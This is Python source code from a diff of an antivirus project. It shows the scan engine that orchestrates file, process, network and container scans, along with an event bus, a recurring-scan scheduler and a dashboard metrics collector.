"""Aggregated result of a process scan."""
processes_scanned: int = 0
threats: List[ProcessThreat] = field(default_factory=list)
scan_duration: float = 0.0
@property
def total_processes(self) -> int:
"""Alias for processes_scanned (backward compat)."""
return self.processes_scanned
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class NetworkScanResult:
"""Aggregated result of a network scan."""
connections_scanned: int = 0
threats: List[NetworkThreat] = field(default_factory=list)
scan_duration: float = 0.0
@property
def total_connections(self) -> int:
"""Alias for connections_scanned (backward compat)."""
return self.connections_scanned
@property
def is_clean(self) -> bool:
return len(self.threats) == 0
@dataclass
class FullScanResult:
"""Combined results from a full scan (files + processes + network + containers)."""
file_scan: ScanResult = field(default_factory=ScanResult)
process_scan: ProcessScanResult = field(default_factory=ProcessScanResult)
network_scan: NetworkScanResult = field(default_factory=NetworkScanResult)
container_scan: Any = None # Optional[ContainerScanResult]
@property
def total_threats(self) -> int:
count = (
len(self.file_scan.threats)
+ len(self.process_scan.threats)
+ len(self.network_scan.threats)
)
if self.container_scan is not None:
count += len(self.container_scan.threats)
return count
@property
def is_clean(self) -> bool:
return self.total_threats == 0
# ---------------------------------------------------------------------------
# Detector protocol (for type hints & documentation)
# ---------------------------------------------------------------------------
class _Detector(Protocol):
"""Any object with a ``detect()`` method matching the BaseDetector API."""
def detect(
self,
file_path: str | Path,
file_content: Optional[bytes] = None,
file_hash: Optional[str] = None,
) -> list: ...
# ---------------------------------------------------------------------------
# Helper: file hashing
# ---------------------------------------------------------------------------
def _hash_file(filepath: Path, algo: str = "sha256") -> str:
"""Return the hex digest of *filepath*.
Delegates to :func:`ayn_antivirus.utils.helpers.hash_file`.
"""
return _hash_file_util(filepath, algo)
# ---------------------------------------------------------------------------
# Detector result → engine dataclass mapping
# ---------------------------------------------------------------------------
_THREAT_TYPE_MAP = {
"VIRUS": ThreatType.VIRUS,
"MALWARE": ThreatType.MALWARE,
"SPYWARE": ThreatType.SPYWARE,
"MINER": ThreatType.MINER,
"ROOTKIT": ThreatType.ROOTKIT,
"HEURISTIC": ThreatType.MALWARE,
}
_SEVERITY_MAP = {
"CRITICAL": Severity.CRITICAL,
"HIGH": Severity.HIGH,
"MEDIUM": Severity.MEDIUM,
"LOW": Severity.LOW,
}
def _map_threat_type(raw: str) -> ThreatType:
"""Convert a detector's threat-type string to :class:`ThreatType`."""
return _THREAT_TYPE_MAP.get(raw.upper(), ThreatType.MALWARE)
def _map_severity(raw: str) -> Severity:
"""Convert a detector's severity string to :class:`Severity`."""
return _SEVERITY_MAP.get(raw.upper(), Severity.MEDIUM)
# ---------------------------------------------------------------------------
# Quick-scan target directories
# ---------------------------------------------------------------------------
QUICK_SCAN_PATHS = [
"/tmp",
"/var/tmp",
"/dev/shm",
"/usr/local/bin",
"/var/spool/cron",
"/etc/cron.d",
"/etc/cron.daily",
"/etc/crontab",
"/var/www",
"/srv",
]
# ---------------------------------------------------------------------------
# ScanEngine
# ---------------------------------------------------------------------------
class ScanEngine:
"""Central orchestrator for all AYN scanning activities.
The engine walks the file system, delegates to pluggable detectors, tracks
statistics, and publishes events on the global :pydata:`event_bus`.
Parameters
----------
config:
Application configuration instance.
max_workers:
Thread pool size for parallel file scanning. Defaults to
``min(os.cpu_count(), 8)``.
"""
def __init__(self, config: Config, max_workers: int | None = None) -> None:
self.config = config
self.max_workers = max_workers or min(os.cpu_count() or 4, 8)
# Detector registry — populated by external plug-ins via register_detector().
# Each detector is a callable: (filepath: Path, cfg: Config) -> List[ThreatInfo]
self._detectors: List[_Detector] = []
self._init_builtin_detectors()
# ------------------------------------------------------------------
# Detector registration
# ------------------------------------------------------------------
def register_detector(self, detector: _Detector) -> None:
"""Add a detector to the scanning pipeline."""
self._detectors.append(detector)
def _init_builtin_detectors(self) -> None:
"""Register all built-in detection engines."""
from ayn_antivirus.detectors.signature_detector import SignatureDetector
from ayn_antivirus.detectors.heuristic_detector import HeuristicDetector
from ayn_antivirus.detectors.cryptominer_detector import CryptominerDetector
from ayn_antivirus.detectors.spyware_detector import SpywareDetector
from ayn_antivirus.detectors.rootkit_detector import RootkitDetector
try:
sig_det = SignatureDetector(db_path=self.config.db_path)
self.register_detector(sig_det)
except Exception as e:
logger.warning("Failed to load SignatureDetector: %s", e)
try:
self.register_detector(HeuristicDetector())
except Exception as e:
logger.warning("Failed to load HeuristicDetector: %s", e)
try:
self.register_detector(CryptominerDetector())
except Exception as e:
logger.warning("Failed to load CryptominerDetector: %s", e)
try:
self.register_detector(SpywareDetector())
except Exception as e:
logger.warning("Failed to load SpywareDetector: %s", e)
try:
self.register_detector(RootkitDetector())
except Exception as e:
logger.warning("Failed to load RootkitDetector: %s", e)
if self.config.enable_yara:
try:
from ayn_antivirus.detectors.yara_detector import YaraDetector
yara_det = YaraDetector()
self.register_detector(yara_det)
except Exception as e:
logger.debug("YARA detector not available: %s", e)
logger.info("Registered %d detectors", len(self._detectors))
# ------------------------------------------------------------------
# File scanning
# ------------------------------------------------------------------
def scan_file(self, filepath: str | Path) -> FileScanResult:
"""Scan a single file through every registered detector.
Parameters
----------
filepath:
Absolute or relative path to the file.
Returns
-------
FileScanResult
"""
filepath = Path(filepath)
result = FileScanResult(path=str(filepath))
if not filepath.is_file():
result.scanned = False
result.error = "Not a file or does not exist"
return result
try:
stat = filepath.stat()
except OSError as exc:
result.scanned = False
result.error = str(exc)
return result
result.size = stat.st_size
if result.size > self.config.max_file_size:
result.scanned = False
result.error = f"File exceeds max size ({result.size} > {self.config.max_file_size})"
return result
# Hash the file — needed by hash-based detectors and for recording.
try:
result.file_hash = _hash_file(filepath)
except OSError as exc:
result.scanned = False
result.error = f"Cannot read file: {exc}"
return result
# Enrich with FileScanner metadata (type classification).
try:
from ayn_antivirus.scanners.file_scanner import FileScanner
file_scanner = FileScanner(max_file_size=self.config.max_file_size)
file_info = file_scanner.scan(str(filepath))
result._file_info = file_info # type: ignore[attr-defined]
except Exception:
logger.debug("FileScanner enrichment skipped for %s", filepath)
# Run every registered detector.
for detector in self._detectors:
try:
detections = detector.detect(filepath, file_hash=result.file_hash)
for d in detections:
threat = ThreatInfo(
path=str(filepath),
threat_name=d.threat_name,
threat_type=_map_threat_type(d.threat_type),
severity=_map_severity(d.severity),
detector_name=d.detector_name,
details=d.details,
file_hash=result.file_hash,
)
result.threats.append(threat)
except Exception:
logger.exception("Detector %r failed on %s", detector, filepath)
# Publish per-file events.
event_bus.publish(EventType.FILE_SCANNED, result)
if result.threats:
for threat in result.threats:
event_bus.publish(EventType.THREAT_FOUND, threat)
return result
# ------------------------------------------------------------------
# Path scanning (recursive)
# ------------------------------------------------------------------
def scan_path(
self,
path: str | Path,
recursive: bool = True,
quick: bool = False,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> ScanResult:
"""Walk *path* and scan every eligible file.
Parameters
----------
path:
Root directory (or single file) to scan.
recursive:
Descend into subdirectories.
quick:
If ``True``, only scan :pydata:`QUICK_SCAN_PATHS` that exist
under *path* (or the quick-scan list itself when *path* is ``/``).
callback:
Optional function called after each file is scanned — useful for
progress reporting.
Returns
-------
ScanResult
"""
scan_type = ScanType.QUICK if quick else ScanType.FULL
result = ScanResult(
scan_path=str(path),
scan_type=scan_type,
start_time=datetime.utcnow(),
)
event_bus.publish(EventType.SCAN_STARTED, {
"scan_id": result.scan_id,
"scan_type": scan_type.value,
"path": str(path),
})
# Collect files to scan.
files = self._collect_files(Path(path), recursive=recursive, quick=quick)
# Parallel scan.
with ThreadPoolExecutor(max_workers=self.max_workers) as pool:
futures = {pool.submit(self.scan_file, fp): fp for fp in files}
for future in as_completed(futures):
try:
file_result = future.result()
except Exception:
result.files_skipped += 1
logger.exception("Unhandled error scanning %s", futures[future])
continue
if file_result.scanned:
result.files_scanned += 1
else:
result.files_skipped += 1
result.threats.extend(file_result.threats)
if callback is not None:
try:
callback(file_result)
except Exception:
logger.exception("Scan callback raised an exception")
result.end_time = datetime.utcnow()
event_bus.publish(EventType.SCAN_COMPLETED, {
"scan_id": result.scan_id,
"files_scanned": result.files_scanned,
"threats": len(result.threats),
"duration": result.duration_seconds,
})
return result
# ------------------------------------------------------------------
# Process scanning
# ------------------------------------------------------------------
def scan_processes(self) -> ProcessScanResult:
"""Inspect all running processes for known miners and anomalies.
Delegates to :class:`~ayn_antivirus.scanners.process_scanner.ProcessScanner`
for detection and converts results to engine dataclasses.
Returns
-------
ProcessScanResult
"""
from ayn_antivirus.scanners.process_scanner import ProcessScanner
result = ProcessScanResult()
start = time.monotonic()
proc_scanner = ProcessScanner()
scan_data = proc_scanner.scan()
result.processes_scanned = scan_data.get("total", 0)
# Known miner matches.
for s in scan_data.get("suspicious", []):
threat = ProcessThreat(
pid=s["pid"],
name=s.get("name", ""),
cmdline=" ".join(s.get("cmdline") or []),
cpu_percent=s.get("cpu_percent", 0.0),
memory_percent=0.0,
threat_type=ThreatType.MINER,
severity=Severity.CRITICAL,
details=s.get("reason", "Known miner process"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# High-CPU anomalies (skip duplicates already caught as miners).
miner_pids = {t.pid for t in result.threats}
for h in scan_data.get("high_cpu", []):
if h["pid"] in miner_pids:
continue
threat = ProcessThreat(
pid=h["pid"],
name=h.get("name", ""),
cmdline=" ".join(h.get("cmdline") or []),
cpu_percent=h.get("cpu_percent", 0.0),
memory_percent=0.0,
threat_type=ThreatType.MINER,
severity=Severity.HIGH,
details=h.get("reason", "Abnormally high CPU usage"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Hidden processes (possible rootkit).
for hp in scan_data.get("hidden", []):
threat = ProcessThreat(
pid=hp["pid"],
name=hp.get("name", ""),
cmdline=hp.get("cmdline", ""),
cpu_percent=0.0,
memory_percent=0.0,
threat_type=ThreatType.ROOTKIT,
severity=Severity.CRITICAL,
details=hp.get("reason", "Hidden process"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Optional memory scan for suspicious PIDs.
try:
from ayn_antivirus.scanners.memory_scanner import MemoryScanner
mem_scanner = MemoryScanner()
suspicious_pids = {t.pid for t in result.threats}
for pid in suspicious_pids:
try:
mem_result = mem_scanner.scan(pid)
rwx_regions = mem_result.get("rwx_regions") or []
if rwx_regions:
result.threats.append(ProcessThreat(
pid=pid,
name="",
cmdline="",
cpu_percent=0.0,
memory_percent=0.0,
threat_type=ThreatType.ROOTKIT,
severity=Severity.HIGH,
details=(
f"Injected code detected in PID {pid}: "
f"{len(rwx_regions)} RWX region(s)"
),
))
except Exception:
pass # Memory scan for individual PID is best-effort
except Exception as exc:
logger.debug("Memory scan skipped: %s", exc)
result.scan_duration = time.monotonic() - start
return result
# ------------------------------------------------------------------
# Network scanning
# ------------------------------------------------------------------
def scan_network(self) -> NetworkScanResult:
"""Scan active network connections for mining pool traffic.
Delegates to :class:`~ayn_antivirus.scanners.network_scanner.NetworkScanner`
for detection and converts results to engine dataclasses.
Returns
-------
NetworkScanResult
"""
from ayn_antivirus.scanners.network_scanner import NetworkScanner
result = NetworkScanResult()
start = time.monotonic()
net_scanner = NetworkScanner()
scan_data = net_scanner.scan()
result.connections_scanned = scan_data.get("total", 0)
# Suspicious connections (mining pools, suspicious ports).
for s in scan_data.get("suspicious", []):
sev = _map_severity(s.get("severity", "HIGH"))
threat = NetworkThreat(
local_addr=s.get("local_addr", "?"),
remote_addr=s.get("remote_addr", "?"),
pid=s.get("pid"),
process_name=(s.get("process", {}) or {}).get("name", ""),
threat_type=ThreatType.MINER,
severity=sev,
details=s.get("reason", "Suspicious connection"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Unexpected listening ports.
for lp in scan_data.get("unexpected_listeners", []):
threat = NetworkThreat(
local_addr=lp.get("local_addr", f"?:{lp.get('port', '?')}"),
remote_addr="",
pid=lp.get("pid"),
process_name=lp.get("process_name", ""),
threat_type=ThreatType.MALWARE,
severity=_map_severity(lp.get("severity", "MEDIUM")),
details=lp.get("reason", "Unexpected listener"),
)
result.threats.append(threat)
event_bus.publish(EventType.THREAT_FOUND, threat)
# Enrich with IOC database lookups — flag connections to known-bad IPs.
try:
from ayn_antivirus.signatures.db.ioc_db import IOCDatabase
ioc_db = IOCDatabase(self.config.db_path)
ioc_db.initialize()
malicious_ips = ioc_db.get_all_malicious_ips()
if malicious_ips:
import psutil as _psutil
already_flagged = {
t.remote_addr for t in result.threats
}
try:
for conn in _psutil.net_connections(kind="inet"):
if not conn.raddr:
continue
remote_ip = conn.raddr.ip
remote_str = f"{remote_ip}:{conn.raddr.port}"
if remote_ip in malicious_ips and remote_str not in already_flagged:
ioc_info = ioc_db.lookup_ip(remote_ip) or {}
result.threats.append(NetworkThreat(
local_addr=(
f"{conn.laddr.ip}:{conn.laddr.port}"
if conn.laddr else ""
),
remote_addr=remote_str,
pid=conn.pid or 0,
process_name=self._get_proc_name(conn.pid),
threat_type=ThreatType.MALWARE,
severity=Severity.CRITICAL,
details=(
f"Connection to known malicious IP {remote_ip} "
f"(threat: {ioc_info.get('threat_name', 'IOC match')})"
),
))
except (_psutil.AccessDenied, OSError):
pass
ioc_db.close()
except Exception as exc:
logger.debug("IOC network enrichment skipped: %s", exc)
result.scan_duration = time.monotonic() - start
return result
# ------------------------------------------------------------------
# Helpers
# ------------------------------------------------------------------
@staticmethod
def _get_proc_name(pid: int) -> str:
"""Best-effort process name lookup for a PID."""
if not pid:
return ""
try:
import psutil as _ps
return _ps.Process(pid).name()
except Exception:
return ""
# ------------------------------------------------------------------
# Container scanning
# ------------------------------------------------------------------
def scan_containers(
self,
runtime: str = "all",
container_id: Optional[str] = None,
):
"""Scan containers for threats.
Parameters
----------
runtime:
Container runtime to target (``"all"``, ``"docker"``,
``"podman"``, ``"lxc"``).
container_id:
If provided, scan only this specific container.
Returns
-------
ContainerScanResult
"""
from ayn_antivirus.scanners.container_scanner import ContainerScanner
scanner = ContainerScanner()
if container_id:
return scanner.scan_container(container_id)
return scanner.scan(runtime)
# ------------------------------------------------------------------
# Composite scans
# ------------------------------------------------------------------
def full_scan(
self,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> FullScanResult:
"""Run a complete scan: files, processes, and network.
Parameters
----------
callback:
Optional per-file progress callback.
Returns
-------
FullScanResult
"""
full = FullScanResult()
# File scan across all configured paths.
aggregate = ScanResult(scan_type=ScanType.FULL, start_time=datetime.utcnow())
for scan_path in self.config.scan_paths:
partial = self.scan_path(scan_path, recursive=True, quick=False, callback=callback)
aggregate.files_scanned += partial.files_scanned
aggregate.files_skipped += partial.files_skipped
aggregate.threats.extend(partial.threats)
aggregate.end_time = datetime.utcnow()
full.file_scan = aggregate
# Process + network.
full.process_scan = self.scan_processes()
full.network_scan = self.scan_network()
# Containers (best-effort — skipped if no runtimes available).
try:
container_result = self.scan_containers()
if container_result.containers_found > 0:
full.container_scan = container_result
except Exception:
logger.debug("Container scanning skipped", exc_info=True)
return full
def quick_scan(
self,
callback: Optional[Callable[[FileScanResult], None]] = None,
) -> ScanResult:
"""Scan only high-risk directories.
Targets :pydata:`QUICK_SCAN_PATHS` and any additional web roots
or crontab locations.
Returns
-------
ScanResult
"""
aggregate = ScanResult(scan_type=ScanType.QUICK, start_time=datetime.utcnow())
event_bus.publish(EventType.SCAN_STARTED, {
"scan_id": aggregate.scan_id,
"scan_type": "quick",
"paths": QUICK_SCAN_PATHS,
})
for scan_path in QUICK_SCAN_PATHS:
p = Path(scan_path)
if not p.exists():
continue
partial = self.scan_path(scan_path, recursive=True, quick=False, callback=callback)
aggregate.files_scanned += partial.files_scanned
aggregate.files_skipped += partial.files_skipped
aggregate.threats.extend(partial.threats)
aggregate.end_time = datetime.utcnow()
event_bus.publish(EventType.SCAN_COMPLETED, {
"scan_id": aggregate.scan_id,
"files_scanned": aggregate.files_scanned,
"threats": len(aggregate.threats),
"duration": aggregate.duration_seconds,
})
return aggregate
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
def _collect_files(
self,
root: Path,
recursive: bool = True,
quick: bool = False,
) -> List[Path]:
"""Walk *root* and return a list of scannable file paths.
Respects ``config.exclude_paths`` and ``config.max_file_size``.
"""
targets: List[Path] = []
if quick:
# In quick mode, only descend into known-risky subdirectories.
roots = [
root / rel
for rel in (
"tmp", "var/tmp", "dev/shm", "usr/local/bin",
"var/spool/cron", "etc/cron.d", "etc/cron.daily",
"var/www", "srv",
)
if (root / rel).exists()
]
# Also include the quick-scan list itself if root is /.
if str(root) == "/":
roots = [Path(p) for p in QUICK_SCAN_PATHS if Path(p).exists()]
else:
roots = [root]
exclude = set(self.config.exclude_paths)
for r in roots:
if r.is_file():
targets.append(r)
continue
iterator = r.rglob("*") if recursive else r.iterdir()
try:
for entry in iterator:
if not entry.is_file():
continue
# Exclude check.
entry_str = str(entry)
if any(entry_str.startswith(ex) for ex in exclude):
continue
try:
if entry.stat().st_size > self.config.max_file_size:
continue
except OSError:
continue
targets.append(entry)
except PermissionError:
logger.warning("Permission denied: %s", r)
return targets

View File

@@ -0,0 +1,119 @@
"""Simple publish/subscribe event bus for AYN Antivirus.
Decouples the scan engine from consumers like the CLI, logger, quarantine
manager, and real-time monitor so each component can react to events
independently.
"""
from __future__ import annotations
import logging
import threading
from enum import Enum, auto
from typing import Any, Callable, Dict, List
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Event types
# ---------------------------------------------------------------------------
class EventType(Enum):
"""All events emitted by the AYN engine."""
THREAT_FOUND = auto()
SCAN_STARTED = auto()
SCAN_COMPLETED = auto()
FILE_SCANNED = auto()
SIGNATURE_UPDATED = auto()
QUARANTINE_ACTION = auto()
REMEDIATION_ACTION = auto()
DASHBOARD_METRIC = auto()
# Type alias for subscriber callbacks.
Callback = Callable[[EventType, Any], None]
# ---------------------------------------------------------------------------
# EventBus
# ---------------------------------------------------------------------------
class EventBus:
"""Thread-safe publish/subscribe event bus.
Usage::
bus = EventBus()
bus.subscribe(EventType.THREAT_FOUND, lambda et, data: print(data))
bus.publish(EventType.THREAT_FOUND, {"path": "/tmp/evil.elf"})
"""
def __init__(self) -> None:
self._subscribers: Dict[EventType, List[Callback]] = {et: [] for et in EventType}
self._lock = threading.Lock()
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def subscribe(self, event_type: EventType, callback: Callback) -> None:
"""Register *callback* to be invoked whenever *event_type* is published.
Parameters
----------
event_type:
The event to listen for.
callback:
A callable with signature ``(event_type, data) -> None``.
"""
with self._lock:
if callback not in self._subscribers[event_type]:
self._subscribers[event_type].append(callback)
def unsubscribe(self, event_type: EventType, callback: Callback) -> None:
"""Remove a previously-registered callback."""
with self._lock:
try:
self._subscribers[event_type].remove(callback)
except ValueError:
pass
def publish(self, event_type: EventType, data: Any = None) -> None:
"""Emit an event, invoking all registered callbacks synchronously.
Exceptions raised by individual callbacks are logged and swallowed so
that one faulty subscriber cannot break the pipeline.
Parameters
----------
event_type:
The event being emitted.
data:
Arbitrary payload — typically a dataclass or dict.
"""
with self._lock:
callbacks = list(self._subscribers[event_type])
for cb in callbacks:
try:
cb(event_type, data)
except Exception:
logger.exception(
"Subscriber %r raised an exception for event %s",
cb,
event_type.name,
)
def clear(self, event_type: EventType | None = None) -> None:
"""Remove all subscribers for *event_type*, or all subscribers if ``None``."""
with self._lock:
if event_type is None:
for et in EventType:
self._subscribers[et].clear()
else:
self._subscribers[event_type].clear()
# ---------------------------------------------------------------------------
# Module-level singleton
# ---------------------------------------------------------------------------
event_bus = EventBus()

View File

@@ -0,0 +1,215 @@
"""Scheduler for recurring scans and signature updates.
Wraps the ``schedule`` library to provide cron-like recurring tasks that
drive the :class:`ScanEngine` and signature updater in a long-running
daemon loop.
"""
from __future__ import annotations
import logging
import time
from typing import Optional
import schedule
from ayn_antivirus.config import Config
from ayn_antivirus.core.engine import ScanEngine, ScanResult
from ayn_antivirus.core.event_bus import EventType, event_bus
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Cron expression helpers
# ---------------------------------------------------------------------------
def _parse_cron_field(field: str, min_val: int, max_val: int) -> list[int]:
"""Parse a single cron field (e.g. ``*/5``, ``1,3,5``, ``0-23``, ``*``).
Returns a sorted list of matching integer values.
"""
values: set[int] = set()
for part in field.split(","):
part = part.strip()
# */step
if part.startswith("*/"):
step = int(part[2:])
values.update(range(min_val, max_val + 1, step))
# range with optional step (e.g. 1-5 or 1-5/2)
elif "-" in part:
range_part, _, step_part = part.partition("/")
lo, hi = range_part.split("-", 1)
step = int(step_part) if step_part else 1
values.update(range(int(lo), int(hi) + 1, step))
# wildcard
elif part == "*":
values.update(range(min_val, max_val + 1))
# literal
else:
values.add(int(part))
return sorted(values)
def _cron_to_schedule(cron_expr: str) -> dict:
"""Convert a 5-field cron expression into components.
Returns a dict with keys ``minutes``, ``hours``, ``days``, ``months``,
``weekdays`` — each a list of integers.
Only *minute* and *hour* are used by the ``schedule`` library adapter
below; the rest are validated but not fully honoured (``schedule`` lacks
calendar-level granularity).
"""
parts = cron_expr.strip().split()
if len(parts) != 5:
raise ValueError(f"Expected 5-field cron expression, got: {cron_expr!r}")
return {
"minutes": _parse_cron_field(parts[0], 0, 59),
"hours": _parse_cron_field(parts[1], 0, 23),
"days": _parse_cron_field(parts[2], 1, 31),
"months": _parse_cron_field(parts[3], 1, 12),
"weekdays": _parse_cron_field(parts[4], 0, 6),
}
# ---------------------------------------------------------------------------
# Scheduler
# ---------------------------------------------------------------------------
class Scheduler:
"""Manages recurring scan and update jobs.
Parameters
----------
config:
Application configuration — used to build a :class:`ScanEngine` and
read schedule expressions.
engine:
Optional pre-built engine instance. If ``None``, one is created from
*config*.
"""
def __init__(self, config: Config, engine: Optional[ScanEngine] = None) -> None:
self.config = config
self.engine = engine or ScanEngine(config)
self._scheduler = schedule.Scheduler()
# ------------------------------------------------------------------
# Job builders
# ------------------------------------------------------------------
def schedule_scan(self, cron_expr: str, scan_type: str = "full") -> None:
"""Schedule a recurring scan using a cron expression.
Parameters
----------
cron_expr:
Standard 5-field cron string (``minute hour dom month dow``).
scan_type:
One of ``"full"``, ``"quick"``, or ``"deep"``.
"""
parsed = _cron_to_schedule(cron_expr)
# ``schedule`` doesn't natively support cron, so we approximate by
# scheduling at every matching hour:minute combination. For simple
# expressions like ``0 2 * * *`` this is exact.
for hour in parsed["hours"]:
for minute in parsed["minutes"]:
time_str = f"{hour:02d}:{minute:02d}"
self._scheduler.every().day.at(time_str).do(
self._run_scan, scan_type=scan_type
)
logger.info("Scheduled %s scan at %s daily", scan_type, time_str)
def schedule_update(self, interval_hours: int = 6) -> None:
"""Schedule recurring signature updates.
Parameters
----------
interval_hours:
How often (in hours) to pull fresh signatures.
"""
self._scheduler.every(interval_hours).hours.do(self._run_update)
logger.info("Scheduled signature update every %d hour(s)", interval_hours)
# ------------------------------------------------------------------
# Daemon loop
# ------------------------------------------------------------------
def run_daemon(self) -> None:
"""Start the blocking scheduler loop.
Runs all pending jobs and sleeps between iterations. Designed to be
the main loop of a background daemon process.
Press ``Ctrl+C`` (or send ``SIGINT``) to exit cleanly.
"""
logger.info("AYN scheduler daemon started — %d job(s)", len(self._scheduler.get_jobs()))
try:
while True:
self._scheduler.run_pending()
time.sleep(30)
except KeyboardInterrupt:
logger.info("Scheduler daemon stopped by user")
# ------------------------------------------------------------------
# Job implementations
# ------------------------------------------------------------------
def _run_scan(self, scan_type: str = "full") -> None:
"""Execute a scan job."""
logger.info("Starting scheduled %s scan", scan_type)
try:
if scan_type == "quick":
result: ScanResult = self.engine.quick_scan()
else:
# "full" and "deep" both scan all paths; deep adds process/network
# via full_scan on the engine, but here we keep it simple.
result = ScanResult()
for path in self.config.scan_paths:
partial = self.engine.scan_path(path, recursive=True)
result.files_scanned += partial.files_scanned
result.files_skipped += partial.files_skipped
result.threats.extend(partial.threats)
logger.info(
"Scheduled %s scan complete — %d files, %d threats",
scan_type,
result.files_scanned,
len(result.threats),
)
except Exception:
logger.exception("Scheduled %s scan failed", scan_type)
def _run_update(self) -> None:
"""Execute a signature update job."""
logger.info("Starting scheduled signature update")
try:
from ayn_antivirus.signatures.manager import SignatureManager
manager = SignatureManager(self.config)
summary = manager.update_all()
total = summary.get("total_new", 0)
errors = summary.get("errors", [])
logger.info(
"Scheduled signature update complete: %d new, %d errors",
total,
len(errors),
)
if errors:
for err in errors:
logger.warning("Feed error: %s", err)
manager.close()
event_bus.publish(EventType.SIGNATURE_UPDATED, {
"total_new": total,
"feeds": list(summary.get("feeds", {}).keys()),
"errors": errors,
})
except Exception:
logger.exception("Scheduled signature update failed")

View File

@@ -0,0 +1,7 @@
"""AYN Antivirus - Live Web Dashboard."""
from ayn_antivirus.dashboard.collector import MetricsCollector
from ayn_antivirus.dashboard.server import DashboardServer
from ayn_antivirus.dashboard.store import DashboardStore
__all__ = ["DashboardServer", "DashboardStore", "MetricsCollector"]

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,181 @@
"""Background metrics collector for the AYN Antivirus dashboard."""
from __future__ import annotations
import asyncio
import logging
import os
import random
from datetime import datetime
from typing import Any, Dict, Optional
import psutil
from ayn_antivirus.constants import DASHBOARD_COLLECTOR_INTERVAL
logger = logging.getLogger("ayn_antivirus.dashboard.collector")
class MetricsCollector:
"""Periodically sample system metrics and store them in the dashboard DB.
Parameters
----------
store:
A :class:`DashboardStore` instance to write metrics into.
interval:
Seconds between samples.
"""
def __init__(self, store: Any, interval: int = DASHBOARD_COLLECTOR_INTERVAL) -> None:
self.store = store
self.interval = interval
self._task: Optional[asyncio.Task] = None
self._running = False
async def start(self) -> None:
"""Begin collecting metrics on a background asyncio task."""
self._running = True
self._task = asyncio.create_task(self._collect_loop())
logger.info("Metrics collector started (interval=%ds)", self.interval)
async def stop(self) -> None:
"""Cancel the background task and wait for it to finish."""
self._running = False
if self._task:
self._task.cancel()
try:
await self._task
except asyncio.CancelledError:
pass
logger.info("Metrics collector stopped")
# ------------------------------------------------------------------
# Internal loop
# ------------------------------------------------------------------
async def _collect_loop(self) -> None:
while self._running:
try:
await asyncio.to_thread(self._sample)
except Exception as exc:
logger.error("Collector error: %s", exc)
await asyncio.sleep(self.interval)
def _sample(self) -> None:
"""Take a single metric snapshot and persist it."""
cpu = psutil.cpu_percent(interval=1)
mem = psutil.virtual_memory()
disks = []
for part in psutil.disk_partitions(all=False):
try:
usage = psutil.disk_usage(part.mountpoint)
disks.append({
"mount": part.mountpoint,
"device": part.device,
"total": usage.total,
"used": usage.used,
"free": usage.free,
"percent": usage.percent,
})
except (PermissionError, OSError):
continue
try:
load = list(os.getloadavg())
except (OSError, AttributeError):
load = [0.0, 0.0, 0.0]
try:
net_conns = len(psutil.net_connections(kind="inet"))
except (psutil.AccessDenied, OSError):
net_conns = 0
self.store.record_metric(
cpu=cpu,
mem_pct=mem.percent,
mem_used=mem.used,
mem_total=mem.total,
disk_usage=disks,
load_avg=load,
net_conns=net_conns,
)
# Periodic cleanup (~1 in 100 samples).
if random.randint(1, 100) == 1:
self.store.cleanup_old_metrics()
# ------------------------------------------------------------------
# One-shot snapshot (no storage)
# ------------------------------------------------------------------
@staticmethod
def get_snapshot() -> Dict[str, Any]:
"""Return a live system snapshot without persisting it."""
cpu = psutil.cpu_percent(interval=0.1)
cpu_per_core = psutil.cpu_percent(interval=0.1, percpu=True)
cpu_freq = psutil.cpu_freq(percpu=False)
mem = psutil.virtual_memory()
swap = psutil.swap_memory()
disks = []
for part in psutil.disk_partitions(all=False):
try:
usage = psutil.disk_usage(part.mountpoint)
disks.append({
"mount": part.mountpoint,
"device": part.device,
"total": usage.total,
"used": usage.used,
"percent": usage.percent,
})
except (PermissionError, OSError):
continue
try:
load = list(os.getloadavg())
except (OSError, AttributeError):
load = [0.0, 0.0, 0.0]
try:
net_conns = len(psutil.net_connections(kind="inet"))
except (psutil.AccessDenied, OSError):
net_conns = 0
# Top processes by CPU
top_procs = []
try:
for p in sorted(psutil.process_iter(['pid', 'name', 'cpu_percent', 'memory_percent']),
key=lambda x: x.info.get('cpu_percent', 0) or 0, reverse=True)[:8]:
info = p.info
if (info.get('cpu_percent') or 0) > 0.1:
top_procs.append({
"pid": info['pid'],
"name": info['name'] or '?',
"cpu": round(info.get('cpu_percent', 0) or 0, 1),
"mem": round(info.get('memory_percent', 0) or 0, 1),
})
except Exception:
pass
return {
"cpu_percent": cpu,
"cpu_per_core": cpu_per_core,
"cpu_cores": psutil.cpu_count(logical=True),
"cpu_freq_mhz": round(cpu_freq.current) if cpu_freq else 0,
"mem_percent": mem.percent,
"mem_used": mem.used,
"mem_total": mem.total,
"mem_available": mem.available,
"mem_cached": getattr(mem, 'cached', 0),
"mem_buffers": getattr(mem, 'buffers', 0),
"swap_percent": swap.percent,
"swap_used": swap.used,
"swap_total": swap.total,
"disk_usage": disks,
"load_avg": load,
"net_connections": net_conns,
"top_processes": top_procs,
"timestamp": datetime.utcnow().isoformat(),
}

View File

@@ -0,0 +1,427 @@
"""AYN Antivirus Dashboard — Web Server with Password Auth.
Lightweight aiohttp server that serves the dashboard SPA and REST API.
Non-localhost access requires username/password authentication via a
session cookie obtained through ``POST /login``.
"""
from __future__ import annotations
import logging
import secrets
import time
from typing import Dict, Optional
from urllib.parse import urlparse
from aiohttp import web
from ayn_antivirus.config import Config
from ayn_antivirus.constants import QUARANTINE_ENCRYPTION_KEY_FILE
from ayn_antivirus.dashboard.api import setup_routes
from ayn_antivirus.dashboard.collector import MetricsCollector
from ayn_antivirus.dashboard.store import DashboardStore
from ayn_antivirus.dashboard.templates import get_dashboard_html
logger = logging.getLogger("ayn_antivirus.dashboard.server")
# ------------------------------------------------------------------
# JSON error handler — prevent aiohttp returning HTML on /api/* routes
# ------------------------------------------------------------------
